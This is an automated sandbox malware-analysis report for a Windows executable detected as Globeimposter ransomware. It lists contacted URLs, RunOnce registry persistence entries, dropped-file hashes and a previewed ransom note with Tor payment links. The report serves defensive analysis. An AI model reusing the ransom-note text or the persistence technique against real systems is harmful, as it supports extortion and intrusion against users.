                                                                                                                              high
                                                                                                                              https://o365auditrealtimeingestion.manage.office.com25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                                                                high
                                                                                                                                https://outlook.office365.com/api/v1.0/me/Activities25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                                                                  high
                                                                                                                                  https://api.office.net25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                                                                    high
                                                                                                                                    https://incidents.diagnosticssdf.office.com25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                                                                      high
                                                                                                                                      http://www.tiro.comMm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://asgsmsproxyapi.azurewebsites.net/25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://clients.config.office.net/user/v1.0/android/policies25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                                                                        high
                                                                                                                                        https://entitlement.diagnostics.office.com25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                                                                          high
                                                                                                                                          http://www.goodfont.co.krMm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                                                                            high
                                                                                                                                            https://substrate.office.com/search/api/v2/init25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                                                                              high
                                                                                                                                              https://outlook.office.com/25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                                                                                high
                                                                                                                                                https://storage.live.com/clientlogs/uploadlocation25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                                                                                  high
                                                                                                                                                  http://www.typography.netDMm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://www.galapagosdesign.com/staff/dennis.htmMm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://outlook.office365.com/25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://webshell.suite.office.com25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                                                                                      high

                                                                                                                                                      Contacted IPs

                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                      Public

                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious

                                                                                                                                                      Private

                                                                                                                                                      IP
                                                                                                                                                      192.168.2.1

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                      Analysis ID:548760
                                                                                                                                                      Start date:06.01.2022
                                                                                                                                                      Start time:13:02:09
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 12m 20s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:full
                                                                                                                                                      Sample file name:Mm7Yq5V7Lu (renamed file extension from none to exe)
                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                      Number of analysed new started processes analysed:36
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal100.rans.evad.winEXE@28/534@0/1
                                                                                                                                                      EGA Information:
                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                      HDC Information:
                                                                                                                                                      • Successful, ratio: 2.6% (good quality ratio 2%)
                                                                                                                                                      • Quality average: 58.5%
                                                                                                                                                      • Quality standard deviation: 39%
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 95%
                                                                                                                                                      • Number of executed functions: 74
                                                                                                                                                      • Number of non-executed functions: 7
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI
                                                                                                                                                      Warnings:
                                                                                                                                                      Show All
                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 52.109.76.68, 52.109.12.22, 52.109.12.24
                                                                                                                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, config.officeapps.live.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      TimeTypeDescription
                                                                                                                                                      13:03:19API Interceptor3x Sleep call for process: Mm7Yq5V7Lu.exe modified
                                                                                                                                                      13:03:28AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce BrowserUpdateCheck C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      13:03:36AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce BrowserUpdateCheck C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      13:03:44AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.xls
                                                                                                                                                      13:03:53AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\read-me.txt

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      No context

                                                                                                                                                      Domains

                                                                                                                                                      No context

                                                                                                                                                      ASN

                                                                                                                                                      No context

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      No context

                                                                                                                                                      Dropped Files

                                                                                                                                                      No context

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\Public\8D9E927358F0E450365F21C7CBB7996EDFF5C6F92A853E877E85154F384B2AD7
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1026
                                                                                                                                                      Entropy (8bit):3.8912931937812134
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:UmdgkiKhHPS0zK8sevWAVgKTaCB7RZ0cHYIgtyUzn:ZDiKfzCwgck38m
                                                                                                                                                      MD5:DFF9B919AE0EE6D5323ED64C2316E6F4
                                                                                                                                                      SHA1:84CB9B304B2EA27EB278439F1F0E315BD7B1E5DA
                                                                                                                                                      SHA-256:6119DD88F9C99E64B9CDFC88588C3D1B5F0A00013FC50D5FA069F3BE9F0F920F
                                                                                                                                                      SHA-512:2003F45A08C06E9A601A547A54FB45BF353C3857941923F30274EB0CAB1EA251028F0CB44EF8C7F72E5DE0DC5C86022242C47B6D388C3A1641A132711D5AAC01
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: 80FAB856E2D6018F69BCC2EFB6580F41DE21CEEA82D27B4BEDACDC12F96F7F7A6730AAD1554E55D053CA9ED0A6ECB9D8795B71082CF255E258382BF07CC603050EDF94DE3B7CB7FF68F8198E2EAE63E7833E52736ADA9F6A27DC7B1851A51DA96815D58FB9038978152A9BE36980F6FD7371084A1FD9ECDBD0A3074CAAC3F7B9..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4
                                                                                                                                                      C:\Users\Public\AccountPictures\desktop.ini
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1152
                                                                                                                                                      Entropy (8bit):5.7590049212340535
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:QAL+tBDcLATy5MAOzK8sevWAVgKTaCB7RZ0cHYIgtyUz2Tn:Qe8cLAT0OzCwgck38HTn
                                                                                                                                                      MD5:0AB23BE42FB0478BD6D1A136E810F338
                                                                                                                                                      SHA1:675C395BEF1C8C1E231BC917808A8F8E3D9A7274
                                                                                                                                                      SHA-256:F7C1F8C1CEA2238796CA6143EDBDFD6689030C96F71F9071951F1660F49A684B
                                                                                                                                                      SHA-512:E74D8BF0425B628738B913208128D8A4CDFB329EB1453493CC86CBA2B814E64F82BCD660924DCAA3DC0E98C36D1095578E77E68F4361A37BBC8FFC39DD8495CE
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .o..6...K<N.<.GA?......`_....ksG.s........\$m7..k.8.t,.[EH.,.._..-O}.w .r-....}Um......L.Ee=.Z..h.=.S.....I...b.L...{M\g.eZ..Z.-44..[U..U:P.(.<..n.q>..o...r..?.IN.[...l..'|h&.....U~..X........dK...1w.O*YiDr.O.-"#$.`../......*....3../..i.U..F..d.gK.8...CXP.....Q2.%....py....n...R-.X...9?.......E...R....R.X.v...y&..P..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A
                                                                                                                                                      C:\Users\Public\AccountPictures\desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1152
                                                                                                                                                      Entropy (8bit):5.7590049212340535
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:QAL+tBDcLATy5MAOzK8sevWAVgKTaCB7RZ0cHYIgtyUz2Tn:Qe8cLAT0OzCwgck38HTn
                                                                                                                                                      MD5:0AB23BE42FB0478BD6D1A136E810F338
                                                                                                                                                      SHA1:675C395BEF1C8C1E231BC917808A8F8E3D9A7274
                                                                                                                                                      SHA-256:F7C1F8C1CEA2238796CA6143EDBDFD6689030C96F71F9071951F1660F49A684B
                                                                                                                                                      SHA-512:E74D8BF0425B628738B913208128D8A4CDFB329EB1453493CC86CBA2B814E64F82BCD660924DCAA3DC0E98C36D1095578E77E68F4361A37BBC8FFC39DD8495CE
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .o..6...K<N.<.GA?......`_....ksG.s........\$m7..k.8.t,.[EH.,.._..-O}.w .r-....}Um......L.Ee=.Z..h.=.S.....I...b.L...{M\g.eZ..Z.-44..[U..U:P.(.<..n.q>..o...r..?.IN.[...l..'|h&.....U~..X........dK...1w.O*YiDr.O.-"#$.`../......*....3../..i.U..F..d.gK.8...CXP.....Q2.%....py....n...R-.X...9?.......E...R....R.X.v...y&..P..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A
                                                                                                                                                      C:\Users\Public\AccountPictures\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\Public\AccountPictures\read-me.txt, Author: Joe Security
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\Public\Desktop\Acrobat Reader DC.lnk
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):3072
                                                                                                                                                      Entropy (8bit):7.474059071145476
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:+K0hCQ45GKqT/o/DxiMMFs4J6IRNrLRjkWR08fUiRmjBfOzCwgck38b:OhLSGKqro/DxiMM5br9EiyIzTEY
                                                                                                                                                      MD5:DBE548AB96F5C990FE5EB299A462A3A0
                                                                                                                                                      SHA1:E26AA95ADE38B477FB9F7A16AD4A6C1E9C557444
                                                                                                                                                      SHA-256:78572086CBE9ECCC02B601FF40593E2EA3C08082F5FCDB3F69200401B4A3A95C
                                                                                                                                                      SHA-512:A5C464035A9D10914B2EB06C24B6B75A04C3AF0C686BCF524EA527FE723C84C6F0DA86FCCC0AD79C3D2F98FD46AD15732A8A640392DD28DCECA907EC986510FA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .G..y~H..6c..Z,U......w....3.....IL..d...v.J7C..b..Y...\.0.....'w...*.7rlzpMA0.j/.._.D?.L.q.*.fM.g6J..U.r'3.x.y.$$. .......{\.u5U4.g*....A[i...[m..\..y.......{_...>.d..8.R.u$]....W.>v...QW..'.....q..F>...R...w.7Z..l_.f..Z...W....d..'........Z!..S[.xX..Q..Q.W....U.rVv.3X.U.&.8i.Q.y.*......x..C......&..9_.4.........fX.....#..-.....m...x.........5....H<.o.K..l.a.AA.)P.<....mY6.e..7.r.".......i..mH....D...[...#. H.6...!..-.......fp...N^.......,...N.GQ.....r64X.....>u.._..*&...yYW..:%2s....:. M.%g.v..H...z..h...X.....g.j.9.z.....*yL.Y.....H...u3.CI.....3.Z...7..n....:.I.m....,...<d....Z.v.oL....v.....e.4;q....[..d6.....Nu..9....4...I5H...g.)^.P$..&.......z+B..W..0D..x.....Zrr.vI..76O.YLXz..@....I4..^..e<U.qHmf..JN.....w>.7...rF.\w....Z.l.T.^.f.m....&)../Wf......B.%#...g$..).>^0$...^...|.......A.N.....g.....#......~.u....t....~M}..hXIO^9@...,J.Ig$.*B.sjq.w...'.V[...Qw{`.3K4A?......X;..F....T.......U..@-....5 ...d*W....."...Q...Q.{.....+..
                                                                                                                                                      C:\Users\Public\Desktop\Acrobat Reader DC.lnk.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):3072
                                                                                                                                                      Entropy (8bit):7.474059071145476
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:+K0hCQ45GKqT/o/DxiMMFs4J6IRNrLRjkWR08fUiRmjBfOzCwgck38b:OhLSGKqro/DxiMM5br9EiyIzTEY
                                                                                                                                                      MD5:DBE548AB96F5C990FE5EB299A462A3A0
                                                                                                                                                      SHA1:E26AA95ADE38B477FB9F7A16AD4A6C1E9C557444
                                                                                                                                                      SHA-256:78572086CBE9ECCC02B601FF40593E2EA3C08082F5FCDB3F69200401B4A3A95C
                                                                                                                                                      SHA-512:A5C464035A9D10914B2EB06C24B6B75A04C3AF0C686BCF524EA527FE723C84C6F0DA86FCCC0AD79C3D2F98FD46AD15732A8A640392DD28DCECA907EC986510FA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .G..y~H..6c..Z,U......w....3.....IL..d...v.J7C..b..Y...\.0.....'w...*.7rlzpMA0.j/.._.D?.L.q.*.fM.g6J..U.r'3.x.y.$$. .......{\.u5U4.g*....A[i...[m..\..y.......{_...>.d..8.R.u$]....W.>v...QW..'.....q..F>...R...w.7Z..l_.f..Z...W....d..'........Z!..S[.xX..Q..Q.W....U.rVv.3X.U.&.8i.Q.y.*......x..C......&..9_.4.........fX.....#..-.....m...x.........5....H<.o.K..l.a.AA.)P.<....mY6.e..7.r.".......i..mH....D...[...#. H.6...!..-.......fp...N^.......,...N.GQ.....r64X.....>u.._..*&...yYW..:%2s....:. M.%g.v..H...z..h...X.....g.j.9.z.....*yL.Y.....H...u3.CI.....3.Z...7..n....:.I.m....,...<d....Z.v.oL....v.....e.4;q....[..d6.....Nu..9....4...I5H...g.)^.P$..&.......z+B..W..0D..x.....Zrr.vI..76O.YLXz..@....I4..^..e<U.qHmf..JN.....w>.7...rF.\w....Z.l.T.^.f.m....&)../Wf......B.%#...g$..).>^0$...^...|.......A.N.....g.....#......~.u....t....~M}..hXIO^9@...,J.Ig$.*B.sjq.w...'.V[...Qw{`.3K4A?......X;..F....T.......U..@-....5 ...d*W....."...Q...Q.{.....+..
                                                                                                                                                      C:\Users\Public\Desktop\Google Chrome.lnk
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):3056
                                                                                                                                                      Entropy (8bit):7.477882945080524
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:bfSxz8a43XLaPJlX96AX0FXvwg2JDxhZR1qXyNRp/dJzCwgck38/Jb:L8RQL2Lyfp6bjJzTEKJb
                                                                                                                                                      MD5:CA3A93B2E6E5CA930A86FE2CCA5DD983
                                                                                                                                                      SHA1:A6776FEBB63C37945F7A217E6D343A4DAC094F0E
                                                                                                                                                      SHA-256:90FB72CF107B91C913DBFAD085782D7F7C302B9BCA14FFB6890B03CA51B80DF8
                                                                                                                                                      SHA-512:E2B5AF34D158ADAEB57624BA90D878B994C29CD4B3C6D89D5BA2154F3726AF12FD774707601D3A2F63CFAD7598D4B06EFC8BF7F564A07BBA64C79BBBDCD710A8
                                                                                                                                                      Malicious:false
